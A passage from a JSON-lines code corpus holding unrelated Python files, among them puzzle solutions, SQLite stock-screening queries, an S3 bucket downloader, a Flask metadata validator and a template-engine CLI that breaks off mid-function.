{}\n for tt in self.ticket_types.keys():\n mapping[tt] = 1\n return mapping\n\n def load_data(self):\n section = 0\n\n for line in self.raw_data:\n if line == \"\":\n continue\n elif line == \"your ticket:\":\n section = 1\n continue\n elif line == \"nearby tickets:\":\n section = 2\n continue\n\n print(f\"S{section} {line}\")\n if section == 0:\n self.add_ticket_type(line)\n elif section == 1:\n self.add_your_ticket(line)\n elif section == 2:\n self.add_nearby_ticket(line)\n\n def add_your_ticket(self, line):\n \"\"\"\n your ticket:\n 7,1,14\n \"\"\"\n self.your_ticket = [int(d) for d in line.split(\",\")]\n\n def add_nearby_ticket(self, line):\n\n \"\"\"\n nearby tickets:\n 7,3,47\n 40,4,50\n 55,2,20\n 38,6,12\n \"\"\"\n self.nearby_tickets.append([int(d) for d in line.split(\",\")])\n\n def add_ticket_type(self, line):\n ticket_type_pattern = re.compile(r\"^([\\w ]+): (\\d+)-(\\d+) or (\\d+)-(\\d+)\")\n \"\"\"\n class: 1-3 or 5-7\n row: 6-11 or 33-44\n seat: 13-40 or 45-50\n \"\"\"\n ticket_data = ticket_type_pattern.match(line)\n self.ticket_types[ticket_data[1]] = (\n (int(ticket_data[2]), int(ticket_data[3])),\n (int(ticket_data[4]), int(ticket_data[5])),\n )\n","sub_path":"day16/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292616887","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 9 10:37:57 2018\n\n@author: js-wxyu\n\"\"\"\n\nimport time\nimport numpy as np\nstart=time.time()\nwith open('Q11.txt') as file_object:\n lines=file_object.readlines()\n\n#读取文件中的数据并存为ndarray\nI=len(lines)\nJ=(len(lines[0])+1)//3\nNum=np.zeros([I,J])\nfor i in range(I):\n k=0\n while len(lines[i][3*k:])>1:\n Num[i][k]=int(lines[i][3*k:3*k+2])\n k+=1\nMul=np.zeros(Num.shape)\nfor i in range(I):\n for j in range(J):\n multip=[0,0,0,0]\n #正下\n if I-i>3:\n multip[1]=Num[i][j]*Num[i+1][j]*Num[i+2][j]*Num[i+3][j]\n #左下\n if j>=3:\n multip[0]=Num[i][j]*Num[i+1][j-1]*Num[i+2][j-2]*Num[i+3][j-3]\n #正右\n if J-j>3 :\n multip[3]=Num[i][j]*Num[i][j+1]*Num[i][j+2]*Num[i][j+3]\n #右下\n if I-i>3:\n multip[2]=Num[i][j]*Num[i+1][j+1]*Num[i+2][j+2]*Num[i+3][j+3]\n Mul[i][j]=np.max(multip)\nprint(np.max(Mul))\nprint(time.time()-start)\n \n \n \n \n \n ","sub_path":"Q11.py","file_name":"Q11.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"146212379","text":"#!/usr/bin/python\nimport sqlite3\nimport sys\n\nDB_FILE = '/app/hickoryStrats/hickory/db/stock_us_db.dat'\nF_TURNOVER = '_3MONTH_AVG_TURNOVER'\nF_RELATIVE_MAP = {'1m':'_1MONTH_HSI_RELATIVE', '3m':'_3MONTH_HSI_RELATIVE', '1y':'_52WEEK_HSI_RELATIVE'}\nLIMIT_MKT_CAP = 0.5 * 100000000\nLIMIT_TURNOVER = 0 * 1000000\nLIMIT_HOT = \"120\"\nTHRESHOLD_RS = \"30\"\n\ndef init():\n\n conn = sqlite3.connect(DB_FILE)\n\n print(\"Opened database successfully\")\n \n conn.close()\n \ndef get_hot_stocks_where_sql(period):\n\n where_sql = (\" from stocks_us_tech, stocks_us where stocks_us.code = stocks_us_tech.code and \"\n + F_TURNOVER + \" >= ? and stocks_us_tech.MARKET_CAPITAL > ? and \"\n + F_RELATIVE_MAP[period] + \" > \" + THRESHOLD_RS\n + \" order by \" + F_RELATIVE_MAP[period] + \" desc limit \" + LIMIT_HOT)\n \n return where_sql\n\ndef get_hot_stocks_code(period):\n\n conn = sqlite3.connect(DB_FILE)\n\n stocks_us = []\n\n if (period in F_RELATIVE_MAP):\n\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP)\n sql = (\"select stocks_us.code\"\n + get_hot_stocks_where_sql(period) + \";\")\n\n elif (period == \"ALL\"):\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP)\n\n sql = (\"select code from (\"\n + \"select * from (Select stocks_us.code\"\n + get_hot_stocks_where_sql(\"1m\") + \") \"\n + \" UNION \"\n + \"select * from (Select stocks_us.code\"\n + get_hot_stocks_where_sql(\"3m\") + \") \"\n + \"UNION \"\n + \"select * from (Select stocks_us.code\"\n + get_hot_stocks_where_sql(\"1y\") + \") \"\n + \" );\")\n \n c = conn.cursor()\n c.execute(sql, t)\n\n stocks_us = [row[0] for row in c.fetchall()]\n\n #print(\"Size: \" + str(len(stocks_us)))\n return stocks_us\n\n\ndef get_hot_stocks_by_industry(industry, period=\"ALL\"):\n\n conn = sqlite3.connect(DB_FILE)\n\n stocks_us = []\n\n if (period in F_RELATIVE_MAP):\n\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, industry)\n sql = (\"select * from (select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.*\"\n + get_hot_stocks_where_sql(period) + \" ) where INDUSTRY_LV2 = ? order by \" + F_RELATIVE_MAP[period] + \";\")\n\n elif (period == \"ALL\"):\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, industry)\n \n sql = (\"select * from (\"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.* \"\n + get_hot_stocks_where_sql(\"1m\") + \") \"\n + \" UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.* \"\n + get_hot_stocks_where_sql(\"3m\") + \") \"\n + \"UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, stocks_us_tech.* \"\n + get_hot_stocks_where_sql(\"1y\") + \") \"\n + \" ) where industry_lv2 = ? order by \" + F_RELATIVE_MAP[\"1y\"] + \" DESC, \" \n + F_RELATIVE_MAP[\"3m\"] + \" DESC, \" + F_RELATIVE_MAP[\"1m\"] + \" DESC;\")\n\n #print(sql)\n c = conn.cursor()\n c.execute(sql, t)\n \n # get column names\n names = [d[0] for d in c.description]\n stocks_us = [dict(zip(names, row)) for row in c.fetchall()]\n \n #print(len(stocks_us)) \n return stocks_us\n\ndef get_hot_industries(period):\n\n conn = sqlite3.connect(DB_FILE)\n\n industry = []\n\n if (period in F_RELATIVE_MAP):\n\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP)\n sql = (\"select industry_lv2, count(1) as count from (select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \" \n + F_RELATIVE_MAP[period] + get_hot_stocks_where_sql(period) + \" ) group by industry_lv2 order by count desc;\")\n \n rows = conn.execute(sql, t)\n for row in rows:\n industry.append(row[0])\n \n elif (period == \"ALL\"):\n #print(\"Get All...\")\n t = (LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP, LIMIT_TURNOVER, LIMIT_MKT_CAP)\n \n sql = (\"select industry_lv2, count(1) as count from (\"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \"\n + F_RELATIVE_MAP['1m'] + \",\" + F_RELATIVE_MAP['3m'] + \",\" + F_RELATIVE_MAP['1y']\n + get_hot_stocks_where_sql(\"1m\") + \") \"\n + \" UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \"\n + F_RELATIVE_MAP[\"1m\"] + \",\" + F_RELATIVE_MAP[\"3m\"] + \",\" + F_RELATIVE_MAP[\"1y\"]\n + get_hot_stocks_where_sql(\"3m\") + \") \" \n + \"UNION \"\n + \"select * from (Select stocks_us.code, stocks_us.industry_lv2, stocks_us.name, \"\n + F_RELATIVE_MAP[\"1m\"] + \",\" + F_RELATIVE_MAP[\"3m\"] + \",\" + F_RELATIVE_MAP[\"1y\"]\n + get_hot_stocks_where_sql(\"1y\") + \") \" \n + \" ) group by industry_lv2 order by count desc;\")\n #print(sql)\n rows = conn.execute(sql, t)\n for row in rows:\n industry.append(row[0])\n \n conn.close()\n \n return industry\n\ndef main(args):\n\n if (args and args[0] == \"init\"):\n init()\n\n #print(get_hot_industries(\"1m\"))\n #print(get_hot_stocks_us_by_industry(\"公用事業\",\"1m\"))\n #print(get_hot_industries(\"1m\"))\n #print(get_hot_industries(\"3m\"))\n #print(get_hot_industries(\"1y\"))\n print(get_hot_industries(\"ALL\"))\n\n print(get_hot_stocks_by_industry(\"Oil & Gas Production\"))\n\n #print(get_hot_stocks_us_by_industry(\"公用事業\",\"1m\"))\n #print(get_hot_stocks_us_by_industry(\"公用事業\",\"ALL\"))\n\n #print(get_hot_stocks_code(\"ALL\"))\n\n '''import math\n industries = get_hot_industries(\"1m\")\n\n num_rows = math.ceil(len(industries) / 4)\n\n for i in range(0, num_rows):\n for j in range(0, 4):\n if (i*4 + j < len(industries)):\n print(\"row\" + str(i) + \" - \" + industries[i*4 + j])\n '''\n\nif __name__ == \"__main__\":\n main(sys.argv[1:]) \n \n\n","sub_path":"hickory/db/stock_us_sector_db.py","file_name":"stock_us_sector_db.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"307225634","text":"import argparse\nimport logging\nimport os\nimport time\n\nimport boto3\n\nfrom autofocus.util import _log_memory\n\n\ndef main(local_folder: str, bucket: str, download_tar: bool=False) -> None:\n \"\"\"Download all files in an S3 bucket locally.\n\n Args:\n local: path to save files to locally\n bucket: S3 bucket to copy locally\n download_tar: Flag for whether or not to download tar files\n \"\"\"\n client = boto3.client('s3')\n resource = boto3.resource('s3')\n download_s3_bucket(\n client=client,\n resource=resource,\n prefix='',\n local_folder=local_folder,\n bucket=bucket,\n download_tar=download_tar\n )\n\n\ndef download_s3_bucket(\n client,\n resource,\n prefix: str,\n local_folder: str,\n bucket: str,\n download_tar: bool=True\n) -> None:\n \"\"\"Download the contents of an S3 bucket, preserving the subfolder structure\n\n Args:\n client (boto3.client): boto3 S3 client\n resource (boto3.resource): boto3 S3 resource\n prefix: prefix of files in S3\n local_folder: path to save files to locally\n bucket: S3 bucket to copy locally\n download_tar: Flag for whether or not to download tar files\n \"\"\"\n print('DOWNLOAD TAR: {}'.format(download_tar))\n paginator = client.get_paginator('list_objects')\n for result in paginator.paginate(Bucket=bucket, Delimiter='/', Prefix=prefix):\n if result.get('CommonPrefixes') is not None:\n for subdir in result.get('CommonPrefixes'):\n print('Current Prefix: {}'.format(subdir.get('Prefix')))\n download_s3_bucket(\n client=client,\n resource=resource,\n prefix=subdir.get('Prefix'),\n local_folder=local_folder,\n bucket=bucket,\n download_tar=download_tar\n )\n if result.get('Contents') is not None:\n for file in result.get('Contents'):\n key = file.get('Key')\n local_path = local_folder + os.sep + key\n if 'tar.gz' in key and not download_tar:\n print('Skipping tar file: {}'.format(key))\n pass\n if not os.path.exists(os.path.dirname(local_path)):\n os.makedirs(os.path.dirname(local_path))\n resource.meta.client.download_file(bucket, key, local_path)\n\n\ndef _parse_args() -> dict:\n \"\"\"Parse command-line arguments, and log them with level INFO.\n\n Also provides file docstring as description for --help/-h.\n\n Returns:\n Command-line argument names and values as keys and values of a\n Python dictionary\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--local-folder', '-l',\n type=str,\n required=True,\n help='Path to local directory to save files to '\n )\n parser.add_argument('--bucket', '-b',\n type=str,\n required=True,\n help='s3 bucket to copy'\n )\n parser.add_argument('--download-tar', '-t',\n action='store_true',\n required=False,\n default=False,\n help='Flag of whether or not to download tar files'\n )\n args = vars(parser.parse_args())\n logging.info(f'Arguments pass at command line: {args}')\n return args\n\n\nif __name__ == '__main__':\n start_time = time.time()\n logging.basicConfig(format='%(levelname)s %(asctime)s %(message)s')\n logging.getLogger().setLevel(logging.INFO)\n args_dict = _parse_args()\n _log_memory()\n\n main(**args_dict)\n\n _log_memory()\n end_time = time.time()\n logging.info(f'Completed in {round(end_time - start_time, 2)} seconds')\n","sub_path":"autofocus/download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"398472682","text":"from flask import Flask, render_template, url_for, request, redirect, flash, session\nimport csv, io, os\nimport pandas as pd\nfrom werkzeug.utils import secure_filename\nfrom tablemusthave import *\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv()) ##allows me to get secret key\n\nALLOWED_EXTENSIONS = {'tsv', 'csv'}\n\n#check if period in filename and has correct extensions\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nchop_mandatory = [\n \"SampleID\",\n \"investigator\",\n \"project_name\",\n \"sample_type\",\n \"tube_barcode\",\n \"box_id\",\n \"box_position\",\n \"study_group\",\n \"date_collected\"\n]\n\nchop_suggested = [\n \"subject_id\",\n \"host_species\",\n \"study_day\",\n \"current_antibiotics\",\n \"recent_antibiotics\",\n \"cage_id\",\n \"mouse_strain\"\n]\n\nsample_type_list = [\n \"Amnoitic fluid\",\n \"BAL\",\n \"Bedding\",\n \"Biofilm\",\n \"Bioreactor\",\n \"Blank swab\",\n \"Blood\",\n \"Breast milk\",\n \"Buffer\",\n \"Cecum\",\n \"Cell lysate\",\n \"Cervical swab\",\n \"Cheek swab\",\n \"Crop\",\n \"Dental plaque\",\n \"Duodenum\",\n \"Dust\",\n \"Elution buffer\",\n \"Empty well\",\n \"Endometrial swab\",\n \"Environmental control\",\n \"Esophageal biopsy\",\n \"Esophagus\",\n \"Feces\",\n \"Feed\",\n \"Fistula\",\n \"Fistula swab\",\n \"Fly food\",\n \"Fruit fly\",\n \"Ileostomy fluid\",\n \"Ileum\",\n \"Kveim reagent\",\n \"Lab water\",\n \"Macular Retina\",\n \"Meconium\",\n \"Medium\",\n \"Microbial culture\",\n \"Mock DNA\",\n \"Mouse chow\",\n \"Nasal swab\",\n \"Nasopharyngeal swab\",\n \"Oral swab\",\n \"Oral wash\",\n \"Oropharyngeal swab\",\n \"Ostomy fluid\",\n \"Pancreatic fluid\",\n \"PCR water\",\n \"Peripheral retina\",\n \"Placenta\",\n \"Plasma\",\n \"Rectal biopsy\",\n \"Rectal swab\",\n \"Saline\",\n \"Saliva\",\n \"Sediment\",\n \"Serum\",\n \"Skin swab\",\n \"Small intestine\",\n \"Soil\",\n \"Sputum\",\n \"Surface swab\",\n \"Tongue swab\",\n \"Tonsil\",\n \"Tracheal aspirate\",\n \"Tracheal control\",\n \"Urethral swab\",\n \"Urine\",\n \"Water\",\n \"Weighing paper\",\n \"Whole gut\",\n \"Large intestine mucosa\",\n \"Large intestine lumen\",\n]\n\nhost_species_list = [\n \"Dog\",\n \"Fruit fly\",\n \"Human\",\n \"Mouse\",\n \"Naked mole rat\",\n \"Pig\",\t\n \"Pigeon\",\n \"Rabbit\",\n \"Rat\",\n \"Rhesus macaque\",\n None\n]\n\n##table to translate what these regex patterns mean\nregex_translate = {\n \"^[0-9A-Za-z._]+$\": \" only contain numbers, letters, underscores, and periods\",\n \"^[0-9A-Za-z_]+$\": \" only contain numbers, letters, and underscores\",\n \"^[A-Za-z]\": \" only start with capital or lowercase letters\",\n \"^[0-9A-Za-z._+-\\/<>=|,() ]+$\": \" only contain numbers, letters, spaces, and allowed characters inside the bracket [._+-\\/<>=|,()]\",\n \"^[0-9A-Za-z._-]+$\": \" only contain numbers, letters, periods, dashes, and underscores\",\n \"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\": \" be in format yyyy-mm-dd\",\n \"^[0-9]{2}:[0-9]{2}:[0-9]{2}$\": \" be in format hh:mm:ss\",\n \"^[A-H][0-9]{2}$\": \" only contain a letter from A-H and a number 1-12\",\n \"^[ATCGURYKMSWBDHVN]+$\": \" only contain nucleotide symbols\"\n}\n\n##function to check unique combinations for these column inputs\ndef uniq_comb(spec, col1, col2):\n spec.append(unique_values_for(col1, col2))\n spec.append(some_value_for(col1, col2))\n spec.append(unique_values_for(col2, col1))\n spec.append(some_value_for(col2, col1))\n\n##specification is an object of MustHave class which contains other classes that checks table by calling a function that returns AllGood or StillNeeds class (DoesntApply class is called if no such column exists in the input)\nspecification = MustHave(\n columns_named(chop_mandatory), ##must contain these columns\n columns_matching(\"^[0-9A-Za-z_]+$\"), ##column names must satisfy this regex\n values_matching(\"SampleID\", \"^[A-Za-z]\"), ##columns must satisfy this regex\n values_matching(\"SampleID\", \"^[0-9A-Za-z._]+$\"),\n unique_values_for(\"SampleID\"),\n values_in_set(\"sample_type\", sample_type_list), ##sample_type column can only contain values specified in sample_type_list\n values_matching(\"subject_id\", \"^[A-Za-z]\"),\n values_matching(\"subject_id\", \"^[0-9A-Za-z._-]+$\"),\n values_in_set(\"host_species\", host_species_list),\n some_value_for(\"host_species\", \"subject_id\"),\n some_value_for(\"subject_id\", \"host_species\"),\n some_value_for(\"mouse_strain\", \"cage_id\"), ##if mouse_strain is given, a cage_id for that sample must be provided\n values_matching(\"date_collected\", \"^[0-9]{4}-[0-9]{2}-[0-9]{2}$\"),\n values_matching(\"time_collected\", \"^[0-9]{2}:[0-9]{2}:[0-9]{2}$\"),\n unique_values_for(\"barcode\"),\n values_matching(\"barcode\", \"^[ATCGURYKMSWBDHVN]+$\"),\n values_matching(\"reverse_barcode_location\", \"^[A-H][0-9]{2}$\"),\n values_matching(\"forward_barcode_location\", \"^[A-H][0-9]{2}$\"),\n)\n\nuniq_comb(specification, \"box_id\", \"box_position\")\nuniq_comb(specification, \"reverse_barcode_plate\", \"reverse_barcode_location\")\nuniq_comb(specification, \"forward_barcode_plate\", \"forward_barcode_location\")\n\nspecification.extend(some_value_for(c) for c in chop_mandatory) ##these columns cannot be empty\nspecification.extend(values_matching(c, \"^[0-9A-Za-z._+-/<>=,()\\[\\] ]+$\") for c in (chop_mandatory + chop_suggested)) ##all columns must satisfy the regex\n\nfor d in specification.descriptions():\n print(d)\n\napp = Flask(__name__)\napp.secret_key = os.environ.get('SECRET_KEY')\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n filename = \"Select file ...\"\n if request.method == 'GET':\n return render_template('index.html', filename=filename)\n elif request.method == 'POST':\n ##check if post request has a file\n if 'metadata_upload' not in request.files:\n flash('Please select a file')\n return redirect(request.url)\n file_fp = request.files['metadata_upload']\n ##check if user submitted a file\n if file_fp.filename == '':\n flash('No file selected')\n return redirect(request.url)\n if file_fp and not allowed_file(file_fp.filename):\n filename = secure_filename(file_fp.filename)\n if(filename.rsplit('.', 1)[1].lower() in ['xls', 'xlsx']):\n flash('Please export your excel file as .csv or .tsv first')\n return redirect(request.url) \n else:\n flash('Please use the allowed file extensions for the metadata {.tsv, .csv}')\n return redirect(request.url)\n ##check if file was submitted and if it has correct extensions\n if file_fp and allowed_file(file_fp.filename):\n filename = secure_filename(file_fp.filename)\n delim = ','\n\n ##convert FileStorage to StringIO to read as csv/tsv object\n string_io = io.StringIO(file_fp.read().decode('utf-8-sig'), newline=None)\n if(filename.rsplit('.', 1)[1].lower() == 'tsv'):\n delim = '\\t'\n \n t = Table.from_csv(string_io, delimiter = delim)\n \n ##get metadata table to print on webpage\n headers = t.colnames()\n sample_num = len(t.get(t.colnames()[0]))\n rows = list(range(0, sample_num))\n\n #overall check to see if metadata satisfies all requirements\n checks = specification.check(t)\n all_msg = [msg[1].message() for msg in checks]\n print(all_msg)\n if(all(msg == 'OK' or \"Doesn't apply\" in msg for msg in all_msg)):\n flash('Your metadata is good to go!')\n else:\n flash('Your metadata still has errors!')\n\n ##create dictionaries for misformmated cell highlighting and popover text\n header_issues = {}\n highlight_missing = {}\n highlight_mismatch = {}\n highlight_repeating = {}\n highlight_not_allowed = {}\n \n ##print requirements and save the errors in the dictionarys to highlight in table\n for req, res in specification.check(t):\n if(isinstance(res, musthave.StillNeeds)):\n ##print(req.__dict__)\n ##print(res.__dict__)\n ##populate missing dictionary with empty cells\n if(res.idxs is not None):\n for row_num in res.idxs:\n for col_nam in req.colnames:\n if row_num in highlight_missing.keys():\n highlight_missing = {**highlight_missing, **{row_num: highlight_missing[row_num] + [col_nam]}}\n else:\n highlight_missing = {**highlight_missing, **{row_num: [col_nam]}}\n ##populate header dictionary for empty cell dictionary\n if len(req.colnames) == 1:\n header_issues = {**header_issues, **{req.colnames[0]: \"Empty cell\"}}\n ##populate header dictionary for unique cells between 2 or more columns\n else:\n header_issues = {**header_issues, **{req.colnames[0]: (\" + \".join(req.colnames) + \" must be filled in together\")}}\n ##populate mismatch dictionary for illegally formmated cells (e.g. containing specials characters)\n if(res.not_matching is not None and hasattr(req, \"colname\")):\n highlight_mismatch = {**highlight_mismatch, **{cells : req.colname for cells in res.not_matching}}\n header_issues = {**header_issues, **{req.colname: \"Wrong formatting\"}}\n ##populate header dictionary with column names with wrong format\n if(res.not_matching is not None and not hasattr(req, \"colname\")):\n header_issues = {**header_issues, **{col_names: \"Forbidden characters in column name\" for col_names in res.not_matching}}\n ##populate repeating dictionary with repeating cells\n if(res.repeated is not None):\n highlight_repeating = {**highlight_repeating, **{cells[0][0] : req.colnames[0] for cells in res.repeated}}\n header_issues = {**header_issues, **{req.colnames[0]: \"Repeated values\"}}\n ##populate dictionary with cells that does not hold a pre-selected option\n if(res.not_allowed is not None):\n highlight_not_allowed = {**highlight_not_allowed, **{cells : req.colname for cells in res.not_allowed}}\n header_issues = {**header_issues, **{req.colname: \"Use only allowed selections\"}}\n ##print error messages\n if res.message() != 'OK' and \"Doesn't apply\" not in res.message():\n modified_descrip = req.description()[:-1]\n for keys in regex_translate.keys():\n if keys in req.description():\n modified_descrip = modified_descrip.split('match')[0] + regex_translate[keys]\n flash(modified_descrip + \": \" + res.message())\n #print(highlight_repeating)\n return render_template('index.html', filename=filename, headers=headers, rows=rows, table=t, missing=highlight_missing, mismatch=highlight_mismatch, repeating=highlight_repeating, not_allowed=highlight_not_allowed, header_issues=header_issues)\n return redirect(request.url)\n\n@app.route('/wiki')\ndef wiki():\n return render_template('wiki.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"529542864","text":"#!/usr/bin/env python3\nimport random\n\n\nclass ares:\n \"\"\"defines antagonist shell\"\"\"\n def __init__(self):\n villain = [\"Viktor\", \"Konstantin\", \"Werther\", \"Ishmael\", \"Dorian\",\n \"Tyler\", \"Billy\", \"Idiot\"]\n self.name = villain[random.randint(0, len(villain)-1)]\n self.hp = random.randint(1, 3)\n self.strength = self.hp\n\n def __str__(self):\n return \"NAME:{0} HP:{1}\".format(self.name, self.hp)\n\n\nclass bro:\n \"\"\"defines protagonist shell\"\"\"\n def __init__(self, name, hp=10):\n self.name = name\n self.hp = hp\n self.pockets = []\n self.strength = 3\n\n def __str__(self):\n return \"NAME:{0} HP:{1}\".format(self.name, self.hp)\n\n\nclass a_room:\n \"\"\"defines what shall be encountered as gameplay continues\"\"\"\n def __init__(self):\n loot = [\"quarter: shiny!!\", \"chips: a healthy snack for later\",\n \"kitteh: it says 'meow'\", \"the sword of alexander: glistens\",\n \"tv remote: it's missing the mute button...\"]\n self.foes = []\n numb_foes = random.randint(1, 2)\n for x in range(numb_foes):\n self.foes.append(ares())\n if random.randint(1, 3) % 2 == 0:\n self.treasure = loot[random.randint(0, len(loot) - 1)]\n else:\n self.treasure = None\n\n\ndef intro_scene():\n return print(\"\"\"\n you are missing a shoe...\n your phone will not even light up...\n your head is throbbing...\n better go through the only door you see...\n \"\"\")\n\n\ndef outro_scene_1():\n return print(\"\"\"\n you are seeing sky blue...\n a fresh coffee is in your cup...\n you begin sobbing...\n ev'rything a rotten memory...\n \"\"\")\n","sub_path":"characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"585590858","text":"from tests import test_base\nimport requests\n\n\nclass TestOrderCoupon(test_base.TestBase):\n path = \"/order/coupon/{order_coupon}\"\n\n def request(self):\n self.response = requests.request(\n method=\"PUT\", url=self.environment[\"host\"] + self.path.format(\n order_coupon=self.environment[\"custom_variables\"][\"order_coupon\"]), headers=self.environment[\"headers\"], data={\n })\n return self\n","sub_path":"userdata/api_test/tests/regress/test_order_coupon.py","file_name":"test_order_coupon.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"437425378","text":"# board = [[0,2,0],[1,2,0],[2,2,1]]\n# moves = [1,2,2,2,1,3]\n# board = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\n# moves = [1, 5, 3, 5, 1, 2, 1, 4]\nboard= [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2], [3, 5, 1, 3, 1]]\nmoves= [1, 5, 3, 5, 1, 2, 5, 1, 4, 3]\n\ndef solution(board, moves):\n basket = []\n answer = 0\n i =0\n\n for move in moves:\n for j in range(0, len(board)):\n if board[j][move - 1] == 0:\n continue\n else:\n basket.append(board[j][move - 1])\n board[j][move - 1] = 0\n break\n # print(basket)\n\n while True:\n if basket[i] != basket[i + 1]:\n i+=1\n if i ==len(basket)-1:\n break\n else:\n continue\n else:\n del basket[i:i + 2]\n answer += 2\n i=0\n # print(basket)\n # print(answer)\n if len(basket)<=1 :\n break\n\n return answer\n\n\nprint(solution(board,moves))","sub_path":"level1/크레인인형뽑기.py","file_name":"크레인인형뽑기.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483009727","text":"'''\nGiven a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing only 1's and return its area.\n'''\nclass Solution:\n def maximalRectangle(self, matrix):\n max_answer = 0\n if matrix == []:\n return 0\n len_x = len(matrix[0])\n len_y = len(matrix)\n for i in range(len_x):\n for j in range(len_y):\n if matrix[j][i] == \"1\":\n start_j = j\n start_i = i\n high_now = 0\n min_len = 100\n while matrix[start_j][start_i] == \"1\" and start_j < len_y:\n high_now += 1\n len_now = 0\n while start_i < len_x and matrix[start_j][start_i] == \"1\":\n len_now += 1\n start_i += 1\n start_i = i\n min_len = min(min_len, len_now)\n max_answer = max(high_now * min_len, max_answer)\n start_j += 1\n if start_j == len_y:\n break\n #print(max_answer)\n return max_answer\n\nnums1 = [\n [\"1\",\"0\",\"1\",\"0\",\"0\",\"0\"],\n [\"1\",\"0\",\"1\",\"1\",\"1\",\"1\"],\n [\"1\",\"1\",\"1\",\"1\",\"1\",\"1\"],\n [\"1\",\"0\",\"0\",\"1\",\"0\",\"0\"]\n]\nfunction = Solution()\nfunction.maximalRectangle(nums1)","sub_path":"Array/problem85/maximal_rectangle.py","file_name":"maximal_rectangle.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"236047235","text":"#\n# Copyright (C) 2015 Satoru SATOH \n# License: MIT\n#\n\"\"\"\nCLI frontend for various template engines.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\nimport optparse # argparse is not available in python 2.6 standard lib.\nimport sys\n\nimport anytemplate.api\nimport anytemplate.globals\nimport anytemplate.utils\n\n\nLOGGER = anytemplate.globals.LOGGER\n\n\ndef option_parser():\n \"\"\"\n :return: Option parsing object :: optparse.OptionParser\n \"\"\"\n defaults = dict(template_paths=[], contexts=[], schema=None, output='-',\n engine=None, list_engines=False, verbose=1)\n\n psr = optparse.OptionParser(\"%prog [OPTION ...] TEMPLATE_FILE\")\n psr.set_defaults(**defaults)\n\n psr.add_option(\"-T\", \"--template-path\", action=\"append\",\n dest=\"template_paths\",\n help=\"Template search path can be specified multiple \"\n \"times. Note: Dir in which given template exists is \"\n \"always included in the search paths (at the end of \"\n \"the path list) regardless of this option. \")\n psr.add_option(\"-C\", \"--context\", action=\"append\", dest=\"contexts\",\n help=\"Specify file path and optionally its filetype, to \"\n \"provides context data to instantiate templates. \"\n \" The option argument's format is \"\n \" [type:]\"\n \" ex. -C json:common.json -C ./specific.yaml -C \"\n \"yaml:test.dat, -C yaml:/etc/foo.d/*.conf\")\n psr.add_option(\"-s\", \"--schema\",\n help=\"JSON schema file in any formats anyconfig supports, \"\n \"to validate context files\")\n psr.add_option(\"-E\", \"--engine\",\n help=\"Specify template engine name such as 'jinja2'\")\n psr.add_option(\"-L\", \"--list-engines\", action=\"store_true\",\n help=\"List supported template engines in your environment\")\n psr.add_option(\"-o\", \"--output\", help=\"Output filename [stdout]\")\n psr.add_option(\"-v\", \"--verbose\", action=\"store_const\", const=0,\n help=\"Verbose mode\")\n psr.add_option(\"-q\", \"--quiet\", action=\"store_const\", const=2,\n dest=\"verbose\", help=\"Quiet mode\")\n return psr\n\n\ndef get_loglevel(level):\n \"\"\"\n Set log level.\n\n >>> assert get_loglevel(2) == logging.WARN\n >>> assert get_loglevel(10) == logging.INFO\n \"\"\"\n try:\n return 